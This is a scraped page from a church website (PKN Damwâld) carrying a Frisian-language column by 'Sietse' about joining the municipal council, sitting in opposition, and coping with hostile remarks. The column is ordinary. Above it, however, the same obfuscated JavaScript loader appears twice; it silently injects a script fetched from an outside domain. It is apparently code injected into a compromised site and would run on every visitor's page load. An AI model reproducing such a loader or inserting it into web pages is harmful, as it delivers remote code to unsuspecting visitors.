;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Wat is der oan’e hân... - PKN Damwâld

Wat is der oan’e hân…

Gepubliceerd op: maandag 11 juni 2018

It is alwer in pear moanne ferlyn, de gemeenteriedsferkiezings. De measten witte wol hoe as it ôfrûn is. It CDA, de klup dy’t my op’e list setten hie, makke in goeie ùtslach en dan komme jo yn’e gemeenterie! Prachtig. Nei in pear moanne kin ik jim fertelle, moai wurk en,o ja, frije jûnen bin der hast net mear! Mar hawar “ledigheid is des duivels oor kussen”, dus wat dwaan is net ferkeard. Troch dat guon partijen wat oare noarmen en wearden hantearje as it CDA, bin wy yn in oppositierol bedarre. Wer komt it dan op oan; tichtby jo sels bliuwe! Net om jo hinne slaan, mar sjen litte dat jo net in ” ropper en razer” bin, mar foar ùtsjogge, koartsein; Sizzen is neat mar dwaan is in ding! Yn de ôfrûne tiid is it my al in pear kear oerkaam, dat guon minsken ynienen oars mei jo omgean; krekt as bin ik in oare Sietse wurden. En, o ja, harren persoanlike frustraasjes fertelle se dy net ûnder fjouwer eagen, mar fia de mail, lekker maklik!! Sadwaande de”kop” boppe dit stikje; Wat is der oan de hân mei ùs minsken?? Koartby prate ik deroer mei in frou fan hast njoggentich jier. Ik fertelde har dat it my soms wat swier-moedich makke. Jo ynsette foar de tsjerke, it keatsen, de polityk ensf. hinne en dan al dat negatieve praat oer jo hinne krije. Se sei; Sietse, de kop derfoar en; …………altyd omheech sjen!!

Columnist:Sietse

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns